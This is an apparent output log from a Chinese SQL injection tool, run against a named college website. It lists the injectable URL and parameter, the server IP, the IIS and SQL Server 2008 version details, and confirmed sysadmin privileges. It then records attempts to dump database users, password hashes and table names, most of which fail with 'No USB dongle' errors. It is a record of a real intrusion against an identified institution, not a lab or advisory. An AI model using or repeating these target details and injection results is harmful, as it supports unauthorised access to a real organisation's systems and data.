■漏洞信息:============================================================
 ・URL:http://www.fjmzw.com/manage/new_cat.asp?Cat_ID=.31.
 ・页面标题：湄洲湾职业技术学院欢迎您！！！
 ・参数:Cat_ID=.31.
 ・方法:GET
 ・类型:String
 ・利用方法:And
 ・脚本语言:asp
 ・IP:218.86.65.126
 ・数据库:SQL Server
 ・HEAD:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Aug 2011 13:05:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 18414
Content-Type: text/html
Expires: Fri, 26 Aug 2011 13:05:20 GMT
Cache-control: no-cache



■数据库信息:============================================================
!!!!!!!!!!!!! No USB dongle! !!!!!!!!!!!!!!
批次获取基本信息失败，开始逐一获取……
 ・当前数据库:fjmzw
 ・版本:Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (X64) 
	Jul  9 2008 14:17:44 
	Copyright (c) 1988-2008 Microsoft Corporation
	Enterprise Edition (64-bit) on Windows NT 5.2 &lt;X64&gt; (Build 3790: Service Pack 2)

■发现SQL2005，建议您先切换到 '杂项工具' 标签页面开启相关设置。
 ・当前用户权限：
sysadmin(sa): 1
dbcreator): 1
bulkadmin: 1
diskadmin: 1
serveradmin: 1
public: 1
db_owner: 1
db_backupoperator: 1
db_datawriter: 1

 ・数据库信息:
db_name	filename
----------------------------------------------------------------------------------------------------
!!!!!!!!!!!!! No USB dongle! !!!!!!!!!!!!!!
取记录数失败，使用设定值：5
!!!!!!!!!!!!! No USB dongle! !!!!!!!!!!!!!!

 ・SQL Server用户名列表：
用户名		角色		安全编号
----------------------------------------------------------------------------------------------------
!!!!!!!!!!!!! No USB dongle! !!!!!!!!!!!!!!
取记录数失败，使用设定值：5
!!!!!!!!!!!!! No USB dongle! !!!!!!!!!!!!!!

 ・数据库相关进程信息:
程序名	状态	主机名	主机进程ID	命令行	NT用户名
----------------------------------------------------------------------------------------------------
!!!!!!!!!!!!! No USB dongle! !!!!!!!!!!!!!!
取记录数失败，使用设定值：5
!!!!!!!!!!!!! No USB dongle! !!!!!!!!!!!!!!

 ・链接的服务器信息:
服务器名	服务器产品	提供者名	数据源	位置	服务器网络名
----------------------------------------------------------------------------------------------------
!!!!!!!!!!!!! No USB dongle! !!!!!!!!!!!!!!
取记录数失败，使用设定值：5
!!!!!!!!!!!!! No USB dongle! !!!!!!!!!!!!!!

 ・数据库用户登录信息：
用户名	密码HASH	数据库编号	语言	时间1	时间2
----------------------------------------------------------------------------------------------------
!!!!!!!!!!!!! No USB dongle! !!!!!!!!!!!!!!
取记录数失败，使用设定值：5
!!!!!!!!!!!!! No USB dongle! !!!!!!!!!!!!!!

------------------------------------------------------------
正在获取数据库 [fjmzw] 的表名……
!!!!!!!!!!!!! No USB dongle! !!!!!!!!!!!!!!
一次性获取失败，正在批次获取……
!!!!!!!!!!!!! No USB dongle! !!!!!!!!!!!!!!
批次获取失败，正在逐条获取……
!!!!!!!!!!!!! No USB dongle! !!!!!!!!!!!!!!
取记录数失败，使用设定值：5
!!!!!!!!!!!!! No USB dongle! !!!!!!!!!!!!!!





!!!!!!!!!!!!! No USB dongle! !!!!!!!!!!!!!!
